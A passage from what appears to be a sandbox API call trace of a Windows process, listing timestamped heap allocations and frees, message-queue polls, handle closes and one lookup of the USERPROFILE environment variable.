wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0195.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.779] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0195.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0195.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0195.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0195.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0195.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0195.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0195.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0195.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0195.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0195.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0195.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0195.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0195.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0195.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0195.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0195.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa170 [0195.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0195.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0195.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0195.781] CloseHandle (hObject=0x2ac) returned 1 [0195.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0195.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0195.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0195.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0195.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0195.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0195.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0195.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0195.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0195.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0195.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0195.783] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0195.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0195.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0195.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0195.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0195.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0195.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0195.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0195.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0195.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0195.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0195.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0195.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0195.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0195.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0195.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0195.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa170 [0195.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0195.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0195.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0195.784] CloseHandle (hObject=0x1f8) returned 1 [0195.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0195.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0195.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0195.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0195.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0195.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0195.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0195.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0195.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0195.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0195.791] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0195.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0195.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0195.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0195.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0195.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0195.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0195.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0195.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0195.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0195.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0195.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0195.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0195.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0195.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0195.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0195.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0195.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0195.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0195.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0195.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0195.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0195.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0195.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0195.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0195.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0195.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0195.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0195.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0195.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0195.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0195.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0195.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0195.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0195.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0195.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0195.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0195.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0195.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0195.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0195.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0195.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0195.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0195.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0195.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0195.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0195.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0195.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0195.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0195.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0195.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0195.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0195.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0195.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0195.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0195.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0195.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0195.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0195.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0195.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0195.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0195.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0195.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0195.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0195.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0195.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0195.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0195.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0195.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0195.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0195.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0195.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0195.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0195.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0195.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0195.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0195.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0195.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0195.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0195.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0195.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0195.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0195.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0195.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0195.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0195.819] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0195.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0195.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0195.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0195.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0195.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0195.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0195.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0195.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0195.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0195.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0195.820] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0195.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0195.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0195.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0195.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0195.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0195.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0195.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0195.820] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0195.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0195.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0195.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0195.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0195.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0195.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0195.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0195.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0195.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0195.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0195.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0195.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0195.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0195.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0195.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0195.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0195.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0195.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0195.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0195.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0195.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0195.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0195.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0195.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0195.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0195.822] HeapFree (in: hHeap=0x25c0000, 